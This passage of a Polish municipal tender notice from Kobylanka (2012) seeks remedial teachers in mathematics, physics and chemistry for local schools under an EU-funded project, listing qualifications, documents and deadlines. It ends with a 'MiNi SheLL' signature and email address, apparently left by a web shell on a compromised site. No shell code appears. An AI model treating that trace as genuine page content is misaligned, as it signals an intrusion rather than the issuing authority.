4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć każdej grupy, sporządzonych w uzgodnieniu z Dyrekcją Szkoły co najmniej na 5 dni kalendarzowych przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, bądź wyłącznie przez osoby wykazane w ofercie.
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przeka-zanych przez Zamawiającego
7.	Wykonawca zobowiązany jest do poddania się superwizji w trakcie prowadzenia zajęć. Przewi-dywana częstotliwość superwizji - raz w miesiącu. 
8.	Łączna liczba godzin zajęć w ramach części 9 zamówienia - 22 godziny. 
9.	Wykonawca części 9 zobowiązany jest do opracowania wspólnie z wykonawcą części 7 oraz 8 pod nadzorem Trenera Kluczowego SP indywidualny program terapeutyczny dla każdego ucznia zawierający diagnozę trudności przejawianych przez ucznia, program wyrównania trudności lub ich kompensacji oraz system oddziaływań poprawiających motywację do uczenia się.
10.	Przewidywany termin rozpoczęcia zajęć - XI.2012 r.


Część 10 zamówienia - pełnienie funkcji nauczyciela - specjalisty dla dzieci z trudnościami w nauce matematyki oraz w zakresie wykorzystania wiedzy w praktyce w Gimnazjum w Rep-towie (GR I) 

1.	Przedmiotem zamówienia jest prowadzenie zajęć specjalistycznych dla dzieci z trudnościami w nauce matematyki oraz w zakresie wykorzystania wiedzy w praktyce - 8 uczniów/uczennic w roku. Przewidziana jest jedna edycja zajęć roku szkolnym. W ramach części 10 przewidziane są dwa bloki zajęć: blok A - wyrównywanie trudności dydaktycznych w nauce matematyki (44h), blok B - korekcja trudności w wykorzystaniu wiedzy w praktyce (11h); Prowadzone  metodami aktywizującymi w całości - metoda warsztatowa: mapy umysłowe, mnemotechniki, terapeutycz-ne programy komputerowe, metoda projektu naukowego z wykorzystaniem tablic interaktyw-nych. Uwaga - jedna godzina zajęć = 60 minut.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z po-jazdu.
3.	Częstotliwość zajęć - raz w tygodniu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły.
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć każdej grupy, sporządzonych w uzgodnieniu z Dyrekcją Szkoły co najmniej na 5 dni kalendarzowych przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, bądź wyłącznie przez osoby wykazane w ofercie.
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przeka-zanych przez Zamawiającego
7.	Wykonawca zobowiązany jest do poddania się superwizji w trakcie prowadzenia zajęć. Przewi-dywana częstotliwość superwizji - raz w miesiącu. 
8.	Łączna liczba godzin zajęć w ramach części 10 zamówienia - 55 godzin. 
9.	Wykonawca części 10 zobowiązany jest do opracowania pod nadzorem Trenera Kluczowego Gimna-zjum indywidualnego programu terapeutycznego dla każdego ucznia zawierającego diagnozę trudności przejawianych przez ucznia, program wyrównania trudności lub ich kompensacji oraz system oddziaływań poprawiających motywację do uczenia się.
10.	Przewidywany termin rozpoczęcia zajęć - X.2012 r.

Część 11 zamówienia - pełnienie funkcji nauczyciela - specjalisty dla dzieci z trudnościami w nauce fizyki i chemii oraz w zakresie wykorzystania wiedzy w praktyce w Gimnazjum w Reptowie (GR II) 

1.	Przedmiotem zamówienia jest prowadzenie zajęć specjalistycznych dla dzieci z trudnościami w nauce fizyki i chemii oraz w zakresie wykorzystania wiedzy w praktyce - 8 uczniów/uczennic w roku. Przewidziana jest jedna edycja zajęć roku szkolnym. W ramach części 11 przewidziane są dwa bloki zajęć: blok A - wyrównywanie trudności dydaktycznych w nauce fizyki i chemii (44h), blok B - korekcja trudności w wykorzystaniu wiedzy w praktyce (11h); Prowadzone  metodami aktywizującymi w całości - metoda warsztatowa: mapy umysłowe, mnemotechniki, terapeutyczne programy komputerowe, metoda projektu naukowego z wykorzystaniem tablic interaktywnych. Uwaga - jedna godzina zajęć = 60 minut.
2.	Wykonawca zapewnia opiekę dzieciom w trakcie zajęć, a w przypadku grupy odwożonej do miejsca zamieszkania, zobowiązuje się do odprowadzenia uczestników zajęć do podstawionego pojazdu. Jeśli uczestnicy zajęć dowożeni są na zajęcia, Wykonawca zobowiązany jest również do odebrania uczestników zajęć z pojazdu i zapewnienia im opieki od momentu odebrania z po-jazdu.
3.	Częstotliwość zajęć - raz w tygodniu, w szczególnych przypadkach - częściej. Zajęcia odbywać się winny w dni nauki szkolnej (pon. - pt.) w godzinach pracy szkoły.
4.	Wykonawca będzie obowiązany do przedkładania Zamawiającemu do zatwierdzenia harmonogramów zajęć każdej grupy, sporządzonych w uzgodnieniu z Dyrekcją Szkoły co najmniej na 5 dni kalendarzowych przed rozpoczęciem zajęć. Zamawiający zastrzega sobie prawo do wprowadzania zmian w przedłożonych harmonogramach. 
5.	Zamawiający wymaga od Wykonawcy osobistego wykonania zamówienia, bądź wyłącznie przez osoby wykazane w ofercie.
6.	Wykonawca zobowiązany jest do prowadzenia listy obecności i dzienników zajęć wg wzorów przeka-zanych przez Zamawiającego
7.	Wykonawca zobowiązany jest do poddania się superwizji w trakcie prowadzenia zajęć. Przewi-dywana częstotliwość superwizji - raz w miesiącu. 
8.	Łączna liczba godzin zajęć w ramach części 11 zamówienia - 55 godzin. 
9.	Wykonawca części 11 zobowiązany jest do opracowania pod nadzorem Trenera Kluczowego Gimna-zjum indywidualnego programu terapeutycznego dla każdego ucznia zawierającego diagnozę trudności przejawianych przez ucznia, program wyrównania trudności lub ich kompensacji oraz system oddziaływań poprawiających motywację do uczenia się.
10.	Przewidywany termin rozpoczęcia zajęć - X.2012 r.


UWAGA: 
Zamawiający zastrzega, iż Wykonawcy składając ofertę uwzględnić muszą, iż jedną osobę można wskazać do wykonywania zadań wynikających z maksymalnie dwóch części. Wskazanie jednej oso-by do wykonywania zadań wynikających z większej ilości części spowoduje odrzucenie oferty na podstawie art. 89 ust. 1 pkt. 2 PZP..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawcy składający ofertę wykazali, że dysponują:
a)	Dla części 1 - jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję nauczyciela - specjalisty dla dzieci z trudnościami w nauce matematyki oraz w zakresie wykorzystania wiedzy w praktyce, która spełnia łącznie następujące warunki: 
Wykształcenie wyższe magisterskie, posiadanie kwalifikacji pedagogicznych, posiadanie uprawnień do wykonywania zawodu nauczyciela matematyki w SP, pięcioletnie doświadczenie w zawodzie oraz co najmniej trzyletnie doświadczenie w prowadzeniu zajęć wyrównawczych z matematyki. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów magisterskich, dokumenty potwierdzające posiadanie co najmniej 5-letniego doświadczenia w zawodzie związanym z przedmiotem zamówienia oraz co najmniej trzyletniego doświadczenia w prowadzeniu zajęć wyrównawczych lub korekcyjno - kompensacyjnych z matematyki, 
b)	Dla części 2 - jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję nauczyciela - specjalisty dla dzieci z trudnościami w czytaniu i pisaniu, która spełnia łącznie następujące warunki: 
Wykształcenie wyższe magisterskie, posiadanie kwalifikacji pedagogicznych, posiadanie uprawnień do wykonywania zawodu nauczyciela języka polskiego w SP, pięcioletnie doświadczenie w zawodzie oraz co najmniej trzyletnie doświadczenie w prowadzeniu zajęć wyrównawczych z języka polskiego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów magisterskich, dokumenty potwierdzające posiadanie co najmniej 5-letniego doświadczenia w zawodzie związanym z przedmiotem zamówienia oraz co najmniej trzyletniego doświadczenia w prowadzeniu zajęć wyrównawczych lub korekcyjno - kompensacyjnych z języka polskiego
c)	Dla części 3 - jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję nauczyciela - specjalisty dla dzieci z trudnościami w nauce przyrody oraz w zakresie wykorzystania wiedzy w praktyce, która spełnia łącznie następujące warunki: 
Wykształcenie wyższe magisterskie, posiadanie kwalifikacji pedagogicznych, posiadanie uprawnień do wykonywania zawodu nauczyciela przyrody w SP, pięcioletnie doświadczenie w zawodzie oraz co najmniej trzyletnie doświadczenie w prowadzeniu zajęć wyrównawczych z przyrody. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów magisterskich, dokumenty potwierdzające posiadanie co najmniej 5-letniego doświadczenia w zawodzie związanym z przedmiotem zamówienia oraz co najmniej trzyletniego doświadczenia w prowadzeniu zajęć wyrównawczych lub korekcyjno - kompensacyjnych z przyrody, 
d)	Dla części 4 - jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję nauczyciela - specjalisty dla dzieci z trudnościami w nauce matematyki oraz w zakresie wykorzystania wiedzy w praktyce, która spełnia łącznie następujące warunki: 
Wykształcenie wyższe magisterskie, posiadanie kwalifikacji pedagogicznych, posiadanie uprawnień do wykonywania zawodu nauczyciela matematyki w SP, pięcioletnie doświadczenie w zawodzie oraz co najmniej trzyletnie doświadczenie w prowadzeniu zajęć wyrównawczych z matematyki. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów magisterskich, dokumenty potwierdzające posiadanie co najmniej 5-letniego doświadczenia w zawodzie związanym z przedmiotem zamówienia oraz co najmniej trzyletniego doświadczenia w prowadzeniu zajęć wyrównawczych lub korekcyjno - kompensacyjnych z matematyki, 
e)	Dla części 5 - jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję nauczyciela - specjalisty dla dzieci z trudnościami w czytaniu i pisaniu, która spełnia łącznie następujące warunki: 
Wykształcenie wyższe magisterskie, posiadanie kwalifikacji pedagogicznych, posiadanie uprawnień do wykonywania zawodu nauczyciela języka polskiego w SP, pięcioletnie doświadczenie w zawodzie oraz co najmniej trzyletnie doświadczenie w prowadzeniu zajęć wyrównawczych z języka polskiego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów magisterskich, dokumenty potwierdzające posiadanie co najmniej 5-letniego doświadczenia w zawodzie związanym z przedmiotem zamówienia oraz co najmniej trzyletniego doświadczenia w prowadzeniu zajęć wyrównawczych lub korekcyjno - kompensacyjnych z języka polskiego
f)	Dla części 6 - jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję nauczyciela - specjalisty dla dzieci z trudnościami w nauce przyrody oraz w zakresie wykorzystania wiedzy w praktyce, która spełnia łącznie następujące warunki: 
Wykształcenie wyższe magisterskie, posiadanie kwalifikacji pedagogicznych, posiadanie uprawnień do wykonywania zawodu nauczyciela przyrody w SP, pięcioletnie doświadczenie w zawodzie oraz co najmniej trzyletnie doświadczenie w prowadzeniu zajęć wyrównawczych z przyrody. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów magisterskich, dokumenty potwierdzające posiadanie co najmniej 5-letniego doświadczenia w zawodzie związanym z przedmiotem zamówienia oraz co najmniej trzyletniego doświadczenia w prowadzeniu zajęć wyrównawczych lub korekcyjno - kompensacyjnych z przyrody;
g)	Dla części 7 - jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję nauczyciela - specjalisty dla dzieci z trudnościami w nauce matematyki oraz w zakresie wykorzystania wiedzy w praktyce, która spełnia łącznie następujące warunki: 
Wykształcenie wyższe magisterskie, posiadanie kwalifikacji pedagogicznych, posiadanie uprawnień do wykonywania zawodu nauczyciela matematyki w SP, pięcioletnie doświadczenie w zawodzie oraz co najmniej trzyletnie doświadczenie w prowadzeniu zajęć wyrównawczych z matematyki. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów magisterskich, dokumenty potwierdzające posiadanie co najmniej 5-letniego doświadczenia w zawodzie związanym z przedmiotem zamówienia oraz co najmniej trzyletniego doświadczenia w prowadzeniu zajęć wyrównawczych lub korekcyjno - kompensacyjnych z matematyki, 
h)	Dla części 8 - jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję nauczyciela - specjalisty dla dzieci z trudnościami w czytaniu i pisaniu, która spełnia łącznie następujące warunki: 
Wykształcenie wyższe magisterskie, posiadanie kwalifikacji pedagogicznych, posiadanie uprawnień do wykonywania zawodu nauczyciela języka polskiego w SP, pięcioletnie doświadczenie w zawodzie oraz co najmniej trzyletnie doświadczenie w prowadzeniu zajęć wyrównawczych z języka polskiego. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów magisterskich, dokumenty potwierdzające posiadanie co najmniej 5-letniego doświadczenia w zawodzie związanym z przedmiotem zamówienia oraz co najmniej trzyletniego doświadczenia w prowadzeniu zajęć wyrównawczych lub korekcyjno - kompensacyjnych z języka polskiego
i)	Dla części 9 - jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję nauczyciela - specjalisty dla dzieci z trudnościami w nauce przyrody oraz w zakresie wykorzystania wiedzy w praktyce, która spełnia łącznie następujące warunki: 
Wykształcenie wyższe magisterskie, posiadanie kwalifikacji pedagogicznych, posiadanie uprawnień do wykonywania zawodu nauczyciela przyrody w SP, pięcioletnie doświadczenie w zawodzie oraz co najmniej trzyletnie doświadczenie w prowadzeniu zajęć wyrównawczych z przyrody. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów magisterskich, dokumenty potwierdzające posiadanie co najmniej 5-letniego doświadczenia w zawodzie związanym z przedmiotem zamówienia oraz co najmniej trzyletniego doświadczenia w prowadzeniu zajęć wyrównawczych lub korekcyjno - kompensacyjnych z przyrody
j)	Dla części 10 - jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję nauczyciela - specjalisty dla dzieci z trudnościami w nauce matematyki oraz w zakre-sie wykorzystania wiedzy w praktyce, która spełnia łącznie następujące warunki: 
Wykształcenie wyższe magisterskie, posiadanie kwalifikacji pedagogicznych, posiadanie uprawnień do wykonywania zawodu nauczyciela matematyki w gimnazjum, pięcioletnie doświadczenie w zawodzie oraz co najmniej trzyletnie doświadczenie w prowadzeniu zajęć wyrównawczych z matematyki. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów magisterskich, dokumenty potwierdzające posiadanie co najmniej 5-letniego doświadczenia w zawodzie związanym z przedmiotem zamówienia oraz co najmniej trzyletniego doświadczenia w prowadzeniu zajęć wyrównawczych lub korekcyjno - kompensacyjnych z matematyki
k)	Dla części 11 - jedną osobą, która pełnić będzie na rzecz Zamawiającego funkcję nauczyciela - specjalisty dla dzieci z trudnościami w nauce fizyki i chemii oraz w za-kresie wykorzystania wiedzy w praktyce, która spełnia łącznie następujące warunki: 
Wykształcenie wyższe magisterskie, posiadanie kwalifikacji pedagogicznych, posiadanie uprawnień do wykonywania zawodu nauczyciela fizyki i chemii w gimnazjum, pięcioletnie doświadczenie w zawodzie oraz co najmniej trzyletnie doświadczenie w prowadzeniu zajęć wyrównawczych z fizyki lub chemii. Do wykazu należy dołączyć następujące dokumenty: opis kwalifikacji, dyplom ukończenia wyższych studiów magisterskich, dokumenty potwierdzające posiadanie co najmniej 5-letniego doświadczenia w zawodzie związanym z przedmiotem zamówienia oraz co najmniej trzyletniego doświadczenia w prowadzeniu zajęć wyrównawczych lub korekcyjno - kompensacyjnych z fizyki lub chemii
spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - kwalifikacje kadry - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, iż zmiana istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy jest zakazana, za wyjątkiem sytuacji, gdy: zmiana jest dla Zamawiającego korzystna; zmiana wynika ze zmiany ustawowej stawki podatku VAT; zmiana wynika ze zmian Zasad finansowania Programu Operacyjnego Kapitał Ludzki lub Wytycznych w zakresie kwalifikowania wydatków w ramach Programu Operacyj-nego Kapitał Ludzki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kobylanka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobylanka ul. Szkolna 12 73-108 Kobylanka..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2012 godzina 09:00, miejsce: Urząd Gminy Kobylanka ul. Szkolna 12 73-108 Kobylanka..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach projektu Myślę, liczę, działam, nr KSI SIMIK 07-13: WND-POKL.09.01.02-32-016/12. Projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com